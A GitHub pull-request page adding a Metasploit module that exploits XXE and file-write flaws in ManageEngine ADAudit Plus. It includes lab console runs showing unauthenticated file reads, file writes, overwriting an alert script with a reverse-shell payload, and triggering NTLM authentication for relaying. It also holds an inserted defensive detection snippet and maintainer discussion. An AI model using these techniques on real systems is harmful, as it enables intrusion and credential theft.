
Add ManageEngine ADAudit Plus auxiliary module for builds 7060 and prior #17132

ErikWynter
Contributor

About

This change adds an auxiliary module (with docs) that exploits unauthenticated XXE (CVE-2021-42847 and CVE-2022-28219) and arbitrary file write (CVE-2021-42847) vulnerabilities in ManageEngine ADAudit Plus in order to perform a variety of unauthenticated actions including arbitrary file read, arbitrary file write and triggering Net-NTLM authentication.
The following five actions are supported:

  • READ_FILE_OR_DIR: Read the contents of a file or directory specified via FILE_OR_DIR_PATH.
  • WRITE_FILE: Write a JSON-compatible (UTF-8) payload to a file specified via FILE_OR_DIR_PATH.
  • LIST_ALERT_SCRIPTS: Locate and list the contents of <install_dir>/alert_scripts/ if this directory exists.
  • OVERWRITE_ALERT_SCRIPT: Overwrite the contents of an existing PowerShell script in <install_dir>/alert_scripts/ with a payload.
  • TRIGGER_NTLM_AUTH: Trigger Net-NTLM authentication from the target (for hash capture/relaying via Responder/impacket-ntlmrelayx etc.).

This module has been successfully tested against ManageEngine ADAudit Plus 7005 running on Windows Server 2012 R2.

Vulnerable Application

  • The WRITE_FILE and OVERWRITE_ALERT_SCRIPT actions can be used to target ManageEngine ADAudit Plus builds prior to 7006.
  • The READ_FILE_OR_DIR, LIST_ALERT_SCRIPTS and TRIGGER_NTLM_AUTH actions affect builds prior to 7060 if the XXE_VECTOR option is set to CVE-2022-28219 (default).
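The build thresholds above, together with the agent endpoint that the module's check probes (/api/agent/tabs/agentGPOWatcherData, visible in the console output below), are enough for a defender to write a quick exposure and detection check. The following is an added example, not code from this PR or from the Metasploit module: it encodes the stated thresholds (file write fixed in 7006, XXE-based actions fixed in 7060), then scans access-log lines for hits on the agent endpoint from hosts that are not known ADAudit Plus agents. The log lines are constructed in Common Log Format, and the idea that only deployed agents should call that endpoint is an assumption, as is the log layout; the real product's log format may differ.

```python
import re
from typing import Iterable

# Build thresholds as stated in the PR description (not taken from the module's code).
FILE_WRITE_FIXED_BUILD = 7006  # WRITE_FILE / OVERWRITE_ALERT_SCRIPT affect builds prior to 7006
XXE_FIXED_BUILD = 7060         # READ_FILE_OR_DIR / LIST_ALERT_SCRIPTS / TRIGGER_NTLM_AUTH affect builds prior to 7060

FILE_WRITE_ACTIONS = ("WRITE_FILE", "OVERWRITE_ALERT_SCRIPT")
XXE_ACTIONS = ("READ_FILE_OR_DIR", "LIST_ALERT_SCRIPTS", "TRIGGER_NTLM_AUTH")

# Endpoint the module's automatic check probes; it appears in the console output of the PR.
AGENT_ENDPOINT = "/api/agent/tabs/agentGPOWatcherData"


def exposed_actions(build: int) -> list[str]:
    """Return the module actions an ADAudit Plus build is still exposed to.

    Uses only the thresholds from the PR description: the arbitrary file write
    affects builds prior to 7006, the XXE-based actions builds prior to 7060.
    """
    exposed: list[str] = []
    if build < FILE_WRITE_FIXED_BUILD:
        exposed.extend(FILE_WRITE_ACTIONS)
    if build < XXE_FIXED_BUILD:
        exposed.extend(XXE_ACTIONS)
    return exposed


# Common Log Format; the real ADAudit Plus access-log layout is an assumption here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def flag_agent_endpoint_requests(lines: Iterable[str], known_agent_ips: set[str]) -> list[dict]:
    """Flag requests to the agent endpoint that do not come from a known agent host.

    The endpoint is reachable without authentication on affected builds, so a
    request from an address that is not a deployed agent is worth an alert.
    """
    findings: list[dict] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse instead of failing on them
        path = m.group("path").split("?", 1)[0]  # ignore any query string
        if path != AGENT_ENDPOINT:
            continue
        if m.group("ip") in known_agent_ips:
            continue
        findings.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "method": m.group("method"),
            "status": int(m.group("status")),
        })
    return findings


# Constructed sample log lines (not captured from a real system).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2023:10:00:01 +0000] "POST /api/agent/tabs/agentGPOWatcherData HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jun/2023:10:00:05 +0000] "POST /api/agent/tabs/agentGPOWatcherData HTTP/1.1" 200 128',
    '198.51.100.7 - - [01/Jun/2023:10:00:06 +0000] "GET / HTTP/1.1" 200 4096',
    'this line is not an access-log entry and is skipped',
]
# Constructed allowlist: the one host assumed to run an ADAudit Plus agent.
KNOWN_AGENTS = {"192.0.2.10"}

if __name__ == "__main__":
    for build in (7005, 7006, 7060):
        print(f"build {build}: exposed to {exposed_actions(build) or 'none of the actions'}")
    for finding in flag_agent_endpoint_requests(SAMPLE_LOG, KNOWN_AGENTS):
        print("ALERT: agent endpoint request from non-agent host:", finding)
```

The build check is a triage aid only: the PR description also notes that the XXE-based actions depend on the XXE_VECTOR setting, so a build number alone does not tell you which vector an attacker would need. The log check deliberately parses leniently and drops unparseable lines, since a single odd line in a log should not stop a sweep over the rest.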

Writeup and demo videos

I have published a writeup that covers the attacks that this module exploits.

In addition, I have created the following demo videos:

  1. This video for the READ_FILE_OR_DIR action
  2. This video for the WRITE_FILE action
  3. This video for the TRIGGER_NTLM_AUTH action
  4. This video for the LIST_ALERT_SCRIPTS and OVERWRITE_ALERT_SCRIPT actions.

Conditional unauthenticated RCE

It should be noted that under certain non-default circumstances, the LIST_ALERT_SCRIPTS and OVERWRITE_ALERT_SCRIPT actions can be used as part of a broader attempt to achieve unauthenticated RCE on ADAudit Plus builds 7004 and 7005. The requirements for this are detailed in my writeup, and video 4 (see previous section) shows what the full attack could look like in practice.

Overlap with manageengine_adaudit_plus_cve_2022_28219

This module uses quite a lot of code that is currently part of the manageengine_adaudit_plus_cve_2022_28219 exploit module by @rbowes-r7 . This is because aspects of this module cover the same vulnerability (CVE-2022-28219). More specifically, the READ_FILE_OR_DIR and LIST_ALERT_SCRIPTS actions take advantage of the same XXE FTP server used in that module in order to obtain directory listings and file contents. It would probably make sense to move most of the duplicate code to a mixin. I'd be happy to do the heavy lifting for that.

Installation Information

Vulnerable versions of ADAudit Plus are available here.

After running the installer, you can launch ADAudit Plus by opening Command Prompt with administrator privileges
and then running: <install_dir>\bin\run.bat

Scenarios

ManageEngine ADAudit Plus build 7005 running on Windows Server 2012 R2 - READ_FILE_OR_DIR

msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > options 

Module options (auxiliary/admin/http/manageengine_adaudit_plus_file_read_write):

   Name              Current Setting   Required  Description
   ----              ---------------   --------  -----------
   ALERT_SCRIPT                        no        Name of an existing PowerShell script in /alert_scripts to overwrite when using OVERWRITE_ALERT_SCRIPT
   CUSTOM_PAYLOAD                      no        Custom payload to use for WRITE_FILE and OVERWRITE_ALERT_SCRIPT. Ignored if USE_MSF_PAYLOAD is true
   DOMAIN                              no        Active Directory domain that the target monitors, Required if XXE VECTOR is CVE-2022-28219
   FILE_OR_DIR_PATH  /windows/win.ini  no        Path to read or write to. For read operations this should contain forward slashes and exclude the drive
   LHOST                               no        The local IP address to use for write operations with USE_MSF_PAYLOAD, or for receiving NTLM auth requests (TRIGGER_NTLM_AUTH)
   LOAD_MODULES                        no        A list of powershell modules separated by a comma to download over the web
   LPORT             4444              no        The listening port to use when using USE_MSF_PAYLOAD
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.91.250    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             8081              yes       The target port (TCP)
   SRVHOST           192.168.91.195    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresse
                                                 s.
   SRVPORT           8080              yes       The local port to listen on.
   SRVPORT_FTP       2121              yes       Port for FTP reverse connection
   SRVPORT_HTTP2     8888              yes       Port for additional HTTP reverse connections
   SSL               false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                             no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI         /                 yes       The base path to ManageEngine ADAudit Plus
   URIPATH                             no        The URI to use for this exploit (default is random)
   USE_MSF_PAYLOAD   true              no        Use the cmd/windows/powershell_reverse_tcp payload for WRITE_FILE and OVERWRITE_ALERT_SCRIPT.
   VHOST                               no        HTTP server virtual host
   XXE_VECTOR        CVE-2021-42847    no        XXE vector for obtaining file contents/directory listings (CVE-2022-28219 or CVE-2021-42847)


Auxiliary action:

   Name              Description
   ----              -----------
   READ_FILE_OR_DIR  Read the contents of a file or directory specified via FILE_OR_DIR_PATH


msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set FILE_OR_DIR_PATH /users/
FILE_OR_DIR_PATH => /users/
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Getting contents for /users/ via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/lREPlWhKGqjI.dtd
[+] Received the following contents for /users/:
Administrator
All Users
Default
Default User
desktop.ini
karen
Public
[*] Server stopped.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set FILE_OR_DIR_PATH /users/karen/
FILE_OR_DIR_PATH => /users/karen/
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Getting contents for /users/karen/ via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/TSFkWlLFTdd.dtd
[+] Received the following contents for /users/karen/:
secret.txt
[*] Server stopped.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set FILE_OR_DIR_PATH /users/karen/secret.txt
FILE_OR_DIR_PATH => /users/karen/secret.txt
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Getting contents for /users/karen/secret.txt via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/BhCFXqLZayD.dtd
[+] Received the following contents for /users/karen/secret.txt:
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you

ManageEngine ADAudit Plus build 7005 running on Windows Server 2012 R2 - WRITE_FILE

msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set action WRITE_FILE 
action => WRITE_FILE
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set FILE_OR_DIR_PATH /users/karen/pwned.txt
FILE_OR_DIR_PATH => /users/karen/pwned.txt
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set use_msf_payload false
use_msf_payload => false
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set custom_payload wynter was here
custom_payload => wynter was here
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > options 

Module options (auxiliary/admin/http/manageengine_adaudit_plus_file_read_write):

   Name              Current Setting         Required  Description
   ----              ---------------         --------  -----------
   ALERT_SCRIPT                              no        Name of an existing PowerShell script in /alert_scripts to overwrite when using OVERWRITE_ALERT_SCRIPT
   CUSTOM_PAYLOAD    wynter was here         no        Custom payload to use for WRITE_FILE and OVERWRITE_ALERT_SCRIPT. Ignored if USE_MSF_PAYLOAD is true
   DOMAIN                                    no        Active Directory domain that the target monitors, Required if XXE VECTOR is CVE-2022-28219
   FILE_OR_DIR_PATH  /users/karen/pwned.txt  no        Path to read or write to. For read operations this should contain forward slashes and exclude the drive
   LHOST                                     no        The local IP address to use for write operations with USE_MSF_PAYLOAD, or for receiving NTLM auth requests (TRIGGER_NTLM_AUTH
                                                       )
   LOAD_MODULES                              no        A list of powershell modules separated by a comma to download over the web
   LPORT             4444                    no        The listening port to use when using USE_MSF_PAYLOAD
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.91.250          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             8081                    yes       The target port (TCP)
   SRVHOST           192.168.91.195          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all ad
                                                       dresses.
   SRVPORT           8080                    yes       The local port to listen on.
   SRVPORT_FTP       2121                    yes       Port for FTP reverse connection
   SRVPORT_HTTP2     8888                    yes       Port for additional HTTP reverse connections
   SSL               false                   no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                   no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI         /                       yes       The base path to ManageEngine ADAudit Plus
   URIPATH                                   no        The URI to use for this exploit (default is random)
   USE_MSF_PAYLOAD   false                   no        Use the cmd/windows/powershell_reverse_tcp payload for WRITE_FILE and OVERWRITE_ALERT_SCRIPT.
   VHOST                                     no        HTTP server virtual host
   XXE_VECTOR        CVE-2021-42847          no        XXE vector for obtaining file contents/directory listings (CVE-2022-28219 or CVE-2021-42847)


Auxiliary action:

   Name        Description
   ----        -----------
   WRITE_FILE  Write a JSON-compatible (UTF-8) payload to a file specified via FILE_OR_DIR_PATH


msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Attempting to write the payload to 
[+] Successfully uploaded the payload
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > set action READ_FILE_OR_DIR 
action => READ_FILE_OR_DIR
msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Getting contents for /users/karen/pwned.txt via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/IaLexyrHsSlcg.dtd
[+] Received the following contents for /users/karen/pwned.txt:
wynter was here
[*] Server stopped.
[*] Auxiliary module execution completed

ManageEngine ADAudit Plus build 7005 running on Windows Server 2012 R2 - LIST_ALERT_SCRIPTS

msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > options 

Module options (auxiliary/admin/http/manageengine_adaudit_plus_file_read_write):

   Name              Current Setting   Required  Description
   ----              ---------------   --------  -----------
   ALERT_SCRIPT                        no        Name of an existing PowerShell script in /alert_scripts to overwrite when using OVERWRITE_ALERT_SCRIPT
   CUSTOM_PAYLOAD                      no        Custom payload to use for WRITE_FILE and OVERWRITE_ALERT_SCRIPT. Ignored if USE_MSF_PAYLOAD is true
   DOMAIN                              no        Active Directory domain that the target monitors, Required if XXE VECTOR is CVE-2022-28219
   FILE_OR_DIR_PATH  /windows/win.ini  no        Path to read or write to. For read operations this should contain forward slashes and exclude the drive
   LHOST                               no        The local IP address to use for write operations with USE_MSF_PAYLOAD, or for receiving NTLM auth requests (TRIGGER_NTLM_AUTH)
   LOAD_MODULES                        no        A list of powershell modules separated by a comma to download over the web
   LPORT             4444              no        The listening port to use when using USE_MSF_PAYLOAD
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.91.250    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             8081              yes       The target port (TCP)
   SRVHOST           192.168.91.195    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresse
                                                 s.
   SRVPORT           8080              yes       The local port to listen on.
   SRVPORT_FTP       2121              yes       Port for FTP reverse connection
   SRVPORT_HTTP2     8888              yes       Port for additional HTTP reverse connections
   SSL               false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                             no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI         /                 yes       The base path to ManageEngine ADAudit Plus
   URIPATH                             no        The URI to use for this exploit (default is random)
   USE_MSF_PAYLOAD   true              no        Use the cmd/windows/powershell_reverse_tcp payload for WRITE_FILE and OVERWRITE_ALERT_SCRIPT.
   VHOST                               no        HTTP server virtual host
   XXE_VECTOR        CVE-2021-42847    no        XXE vector for obtaining file contents/directory listings (CVE-2022-28219 or CVE-2021-42847)


Auxiliary action:

   Name                Description
   ----                -----------
   LIST_ALERT_SCRIPTS  Locate and list the contents of alert_scripts/ in the ADAudit Plus install directory


msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Getting contents for /Program Files/ManageEngine/ADAudit Plus/ via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/WFcOjOdALpjc.dtd
[*] Found the ADAudit Plus installation folder at /Program Files/ManageEngine/ADAudit Plus/.
[*] XXE_VECTOR is CVE-2021-42847. Sleeping 5 seconds before proceeding to ensure the duplicate requests for /Program Files/ManageEngine/ADAudit Plus/ have been processed
[*] Checking for existing alert scripts at /Program Files/ManageEngine/ADAudit Plus/alert_scripts/
[*] Getting contents for /Program Files/ManageEngine/ADAudit Plus/alert_scripts/ via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/SSZaswSACXsRnu.dtd
[+] Found 1 PowerShell script(s) in /alert_scripts/:
user_lockout.ps1
[*] You can overwrite any PowerShell script with a PSH reverse shell via OVERWRITE_ALERT_SCRIPT together with USE_MSF_PAYLOAD
[*] Auxiliary module execution completed

OVERWRITE_ALERT_SCRIPT

msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > options 

Module options (auxiliary/admin/http/manageengine_adaudit_plus_file_read_write):

   Name              Current Setting   Required  Description
   ----              ---------------   --------  -----------
   ALERT_SCRIPT      user_lockout.ps1  no        Name of an existing PowerShell script in /alert_scripts to overwrite when using OVERWRITE_ALERT_SCRIPT
   CUSTOM_PAYLOAD                      no        Custom payload to use for WRITE_FILE and OVERWRITE_ALERT_SCRIPT. Ignored if USE_MSF_PAYLOAD is true
   DOMAIN                              no        Active Directory domain that the target monitors, Required if XXE VECTOR is CVE-2022-28219
   FILE_OR_DIR_PATH  /windows/win.ini  no        Path to read or write to. For read operations this should contain forward slashes and exclude the drive
   LHOST             192.168.91.195    no        The local IP address to use for write operations with USE_MSF_PAYLOAD, or for receiving NTLM auth requests (TRIGGER_NTLM_AUTH)
   LOAD_MODULES                        no        A list of powershell modules separated by a comma to download over the web
   LPORT             4444              no        The listening port to use when using USE_MSF_PAYLOAD
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.91.250    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             8081              yes       The target port (TCP)
   SRVHOST           192.168.91.195    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresse
                                                 s.
   SRVPORT           8080              yes       The local port to listen on.
   SRVPORT_FTP       2121              yes       Port for FTP reverse connection
   SRVPORT_HTTP2     8888              yes       Port for additional HTTP reverse connections
   SSL               false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                             no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI         /                 yes       The base path to ManageEngine ADAudit Plus
   URIPATH                             no        The URI to use for this exploit (default is random)
   USE_MSF_PAYLOAD   true              no        Use the cmd/windows/powershell_reverse_tcp payload for WRITE_FILE and OVERWRITE_ALERT_SCRIPT.
   VHOST                               no        HTTP server virtual host
   XXE_VECTOR        CVE-2021-42847    no        XXE vector for obtaining file contents/directory listings (CVE-2022-28219 or CVE-2021-42847)


Auxiliary action:

   Name                    Description
   ----                    -----------
   OVERWRITE_ALERT_SCRIPT  Overwrite the contents of an existing PowerShell script in alert_scripts/ with a payload


msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Performing sanity check to see if user_lockout.ps1 exists...
[*] Getting contents for /Program Files/ManageEngine/ADAudit Plus/ via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/wOmkRtXagck.dtd
[*] Found the ADAudit Plus installation folder at /Program Files/ManageEngine/ADAudit Plus/.
[*] XXE_VECTOR is CVE-2021-42847. Sleeping 5 seconds before proceeding to ensure the duplicate requests for /Program Files/ManageEngine/ADAudit Plus/ have been processed
[*] Checking for existing alert scripts at /Program Files/ManageEngine/ADAudit Plus/alert_scripts/
[*] Getting contents for /Program Files/ManageEngine/ADAudit Plus/alert_scripts/ via XXE and FTP
[*] Using URL: http://192.168.91.195:8080/AnjjjwMR.dtd
[*] Confirmed that user_lockout.ps1 exists in /alert_scripts
[*] Attempting to overwrite the alert script user_lockout.ps1 with the payload
[+] Successfully wrote the payload to user_lockout.ps1
[*] Auxiliary module execution completed

TRIGGER_NTLM_AUTH

msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > options 

Module options (auxiliary/admin/http/manageengine_adaudit_plus_file_read_write):

   Name              Current Setting   Required  Description
   ----              ---------------   --------  -----------
   ALERT_SCRIPT                        no        Name of an existing PowerShell script in /alert_scripts to overwrite when using OVERWRITE_ALERT_SCRIPT
   CUSTOM_PAYLOAD                      no        Custom payload to use for WRITE_FILE and OVERWRITE_ALERT_SCRIPT. Ignored if USE_MSF_PAYLOAD is true
   DOMAIN                              no        Active Directory domain that the target monitors, Required if XXE VECTOR is CVE-2022-28219
   FILE_OR_DIR_PATH  /windows/win.ini  no        Path to read or write to. For read operations this should contain forward slashes and exclude the drive
   LHOST             192.168.91.195    no        The local IP address to use for write operations with USE_MSF_PAYLOAD, or for receiving NTLM auth requests (TRIGGER_NTLM_AUTH)
   LOAD_MODULES                        no        A list of powershell modules separated by a comma to download over the web
   LPORT             4444              no        The listening port to use when using USE_MSF_PAYLOAD
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.91.250    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             8081              yes       The target port (TCP)
   SRVHOST           192.168.91.195    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresse
                                                 s.
   SRVPORT           8080              yes       The local port to listen on.
   SRVPORT_FTP       2121              yes       Port for FTP reverse connection
   SRVPORT_HTTP2     8888              yes       Port for additional HTTP reverse connections
   SSL               false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                             no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI         /                 yes       The base path to ManageEngine ADAudit Plus
   URIPATH                             no        The URI to use for this exploit (default is random)
   USE_MSF_PAYLOAD   true              no        Use the cmd/windows/powershell_reverse_tcp payload for WRITE_FILE and OVERWRITE_ALERT_SCRIPT.
   VHOST                               no        HTTP server virtual host
   XXE_VECTOR        CVE-2021-42847    no        XXE vector for obtaining file contents/directory listings (CVE-2022-28219 or CVE-2021-42847)


Auxiliary action:

   Name               Description
   ----               -----------
   TRIGGER_NTLM_AUTH  Trigger Net-NTLM authentication from the target (for hash capture/relaying via Responder/impacket-ntlmrelayx etc)


msf6 auxiliary(admin/http/manageengine_adaudit_plus_file_read_write) > run
[*] Running module against 192.168.91.250

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The vulnerable endpoint /api/agent/tabs/agentGPOWatcherData is available and responds with HTTP/200
[*] Triggering Net-NTLM authentication from the target to http://192.168.91.195
[*] Auxiliary module execution completed

@gwillcox-r7
Contributor

gwillcox-r7 commented May 31, 2023

@ErikWynter Does this need updating to pull in the updates from #17133? Would love to review this and get this landed but think we need some reworking to ensure that we aren't duplicating work or using the incorrect functions.

Adding the delayed tag until this is updated to use the updates from #17133

@gwillcox-r7 gwillcox-r7 added the blocked Blocked by one or more additional tasks label May 31, 2023
@ErikWynter
Contributor Author

@gwillcox-r7 hey yeah I'll need to update the branch to get those updates and then adjust some of the code to utilize the final version of the mixin. Before I do that though, I wanted to ask you about the code reuse between this PR and the manageengine_adaudit_plus_cve_2022_28219 . This PR uses almost the exact same code for the XXE FTP server, so I was wondering if you'd prefer me to move that to a mixin, or if it's okay like this? The mixin option would prevent code reuse but would of course require a lot more work, including changes to the manageengine_adaudit_plus_cve_2022_28219 module, which I didn't write, so I don't want to start making changes without prior approval of some kind :)

@gwillcox-r7
Contributor

gwillcox-r7 commented Jun 5, 2023

For the XXE FTP server code, if you reasonably believe that it could be something that would be generic enough to be used across multiple modules, and we don't have existing code for it already, I'd strongly recommend putting it into a mixin/library to ease future module developers' efforts. If however you think it's just the case that these two happened to need this code but it's not a generic technique that other exploits might use, then I'd be okay with it being reused so long as we noted this somewhere.

@ErikWynter
Contributor Author

@gwillcox-r7 thanks, yeah honestly I think this is a relatively isolated case. While the technique on paper could work against various Java apps, it seems exceedingly rare. The reason both modules use the same code is that they exploit the same vulnerability type in the exact same product. So based on what you mention I think we can just keep it in the module for now. If we start seeing this more often, a library is always still a possibility, but I highly doubt that.

@gwillcox-r7
Contributor

Sounds good to me!

@bwatters-r7
Contributor

@ErikWynter any updates on pulling that code in?

@ErikWynter
Contributor Author

@bwatters-r7 thanks for the reminder, I keep forgetting about this one. I'll try and push the required changes for it this week or the next.

@ErikWynter
Contributor Author

Hey I didn't forget about this but I haven't been able to find the time. I'll keep trying though

@adfoster-r7
Contributor

Was just running through the PR queue to see what's possible to land; Do we want to temporarily close this pull request? Or can this land as an interim PR? 👀

@ErikWynter
Contributor Author

@adfoster-r7 sorry for the continued delays on this. I haven't forgotten about this but I had some urgent projects I needed to wrap up first. I'm almost done with that and will get back to this PR after. I can't give an exact date, but I will make sure to push the required changes in December. Would that work?

@smcintyre-r7
Contributor

I'm going to attic this until you're able to get back around to it. When that time comes just let one of us know and we'd be happy to reopen it for you!

@smcintyre-r7 smcintyre-r7 added the attic Older submissions that we still want to work on again label Mar 1, 2024

github-actions bot commented Mar 1, 2024

Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it attic and closed it for now.

What does this generally mean? It could be one or more of several things:

  • It doesn't look like there has been any activity on this pull request in a while
  • We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
  • Sometimes the implementation isn't quite right and a different approach is necessary.

We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!

@github-actions github-actions bot closed this Mar 1, 2024
@ErikWynter
Contributor Author

@smcintyre-r7 hey yeah that makes sense. I haven't forgotten about it, but I have no clue when I'll have time again. Thanks!
